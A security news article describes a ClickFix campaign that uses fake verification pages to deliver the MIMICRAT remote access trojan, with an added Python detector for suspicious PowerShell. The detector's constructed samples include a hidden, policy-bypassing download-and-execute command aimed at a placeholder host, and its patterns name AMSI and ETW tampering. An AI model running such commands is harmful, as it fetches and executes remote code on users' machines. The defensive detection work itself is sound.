ClickFix Campaign Abuses Compromised Sites

Cybersecurity researchers have uncovered a new ClickFix campaign in which attackers hijack legitimate websites to deliver MIMICRAT, a previously undocumented remote access trojan (RAT) that gives its operators full remote control of infected machines.

How the Campaign Starts

The attack begins on compromised legitimate sites; one documented example is a breached BIN (bank identification number) validation service. The attackers inject malicious JavaScript into the site, and that script silently loads an external PHP script.

The PHP script renders a fake Cloudflare verification page that instructs the visitor to copy a command and paste it into the Windows Run dialog (Win+R). Because the victim executes the command themselves, no browser exploit is needed, and many users comply without suspicion, so the infection chain starts unnoticed.

The pasted command launches PowerShell, which fetches a second-stage script from a command-and-control (C2) server. That second stage bypasses ETW logging and AMSI scanning, then drops a Lua-based shellcode loader. The Lua script decrypts the shellcode and executes it in memory, so the payload never reaches disk in cleartext form and file-based scanning has nothing to inspect. The shellcode finally installs MIMICRAT on the victim machine.

MIMICRAT RAT Capabilities

MIMICRAT is a custom C++ remote access trojan that implements 22 post-exploitation commands, including Windows token impersonation and SOCKS5 tunnelling for covert traffic relay.

Operators can control processes and the file system, open interactive shells, inject shellcode, manipulate access tokens, and tunnel traffic through the victim. That level of access is sufficient for ransomware deployment or data theft.

Sophisticated Evasion and Reach

C2 traffic runs over HTTPS on port 443 and is shaped to resemble legitimate web-analytics requests, so it blends into normal browsing and rarely triggers network alerts. The lure page supports 17 languages and localizes itself automatically from the browser's language settings. Victims are spread across many countries; reported hits include a U.S. university and Chinese-speaking users.

The campaign shares tactics with another ClickFix operation that delivered the Matanbuchus loader; both chains end with MIMICRAT deployment. The likely end goal is ransomware or data exfiltration.

The compromised sites are chosen deliberately and span different industries and regions, which keeps the delivery infrastructure resilient: taking down any one site barely dents the campaign.

Prevention Strategies

Organizations and users can blunt these attacks with a few disciplines. Never copy a command from a web page or pop-up into the Run dialog, a terminal, or PowerShell; a genuine verification page never asks for that. Treat a suspicious page as unverified until you have reached the real site directly. On the monitoring side, alert early on unusual PowerShell execution (for instance PowerShell launched from explorer.exe, which is how Win+R starts programs, with hidden-window, policy-bypass, or download-and-execute arguments), on ETW or AMSI tampering, and on connections to unknown HTTPS servers.
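The monitoring advice above can be turned into concrete detection logic. The Python below is an added example, not code from the original article or from the researchers who analysed the campaign. It scores Sysmon-style process-creation events and the Run dialog's history (the RunMRU registry key, which Explorer writes as `<command>\1` entries) for the chain described earlier: explorer.exe spawning PowerShell, a hidden window, a policy bypass, a download cradle, dynamic evaluation, and AMSI/ETW tampering strings. The sample events, the registry values and the host name cdn.example.invalid are constructed for illustration.

```python
"""Score process events and Run-dialog history for ClickFix-style PowerShell.

Added example, not the article's or the researchers' code. Sample events and
registry values are constructed for illustration.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon event ID 1 style)."""
    parent_image: str
    image: str
    command_line: str


# (label, regex) pairs applied to the lower-cased command line. Each hit adds 1.
PATTERNS = [
    ("hidden window", r"-w(indowstyle)?\s+hidden"),
    ("execution policy bypass", r"-e(xecutionpolicy|p)\s+bypass"),
    ("encoded command", r"-e(nc(odedcommand)?|c)\s+[a-z0-9+/=]{20,}"),
    ("download cradle", r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b"),
    ("dynamic evaluation", r"\b(iex|invoke-expression)\b"),
    ("AMSI tampering", r"amsiscanbuffer|amsiinitfailed|amsiutils"),
    ("ETW tampering", r"etweventwrite|automation\.tracing"),
]
POWERSHELL = ("powershell.exe", "pwsh.exe")
RUN_DIALOG_BONUS = 2  # Win+R is the exact entry point ClickFix lures rely on


def score_command_line(cmd: str):
    """Return (score, reasons) from the argument patterns alone."""
    score, reasons = 0, []
    lowered = cmd.lower()
    for label, pattern in PATTERNS:
        if re.search(pattern, lowered):
            score += 1
            reasons.append(label)
    return score, reasons


def score_event(ev: ProcEvent):
    """Score one process-creation event; non-PowerShell images score 0."""
    if not ev.image.lower().endswith(POWERSHELL):
        return 0, []
    score, reasons = score_command_line(ev.command_line)
    # Programs started from the Run dialog are children of explorer.exe.
    if ev.parent_image.lower().endswith("explorer.exe"):
        score += RUN_DIALOG_BONUS
        reasons.insert(0, "powershell spawned by explorer.exe (Run dialog)")
    return score, reasons


def is_clickfix_like(ev: ProcEvent, threshold: int = 3) -> bool:
    return score_event(ev)[0] >= threshold


def runmru_hits(values: dict, threshold: int = 3):
    """Scan HKCU\\...\\Explorer\\RunMRU values (name -> data) for suspicious entries.

    Explorer stores each command as '<command>\\1' under single-letter value
    names; 'MRUList' holds the ordering and is skipped.
    """
    hits = []
    for name, raw in values.items():
        if name == "MRUList":
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        score, reasons = score_command_line(cmd)
        score += RUN_DIALOG_BONUS
        if score >= threshold:
            hits.append((name, cmd, score, reasons))
    return hits


PS_PATH = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [  # constructed
    ProcEvent("C:\\Windows\\explorer.exe", PS_PATH,
              'powershell -w hidden -ep bypass -c "iex (irm https://cdn.example.invalid/verify)"'),
    ProcEvent("C:\\Windows\\System32\\cmd.exe", PS_PATH,
              "powershell -File C:\\scripts\\backup.ps1"),
    ProcEvent("C:\\Windows\\System32\\svchost.exe", PS_PATH,
              "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\tools\\inventory.ps1"),
]
SAMPLE_RUNMRU = {  # constructed
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iex (irm https://cdn.example.invalid/verify)"\\1',
    "MRUList": "ba",
}

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        score, reasons = score_event(ev)
        print(f"{'ALERT' if is_clickfix_like(ev) else 'ok   '} score={score} {reasons}")
    for name, cmd, score, reasons in runmru_hits(SAMPLE_RUNMRU):
        print(f"RunMRU[{name}] score={score} {reasons}: {cmd}")
```

The scheduled-task event carries `-ExecutionPolicy Bypass` yet scores only 1, which is why the rule keys on the combination of parent, window style and cradle rather than on any single flag; tune the threshold against your own baseline of administrative PowerShell use before deploying it.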

Enforce script-execution controls (application allow-listing or PowerShell Constrained Language Mode) and keep AMSI integration enabled so that in-memory script content is still scanned. Train staff to recognize fake verification prompts, especially ones that ask them to run something. Together these steps sharply reduce the success rate of ClickFix campaigns and RAT infections like MIMICRAT.
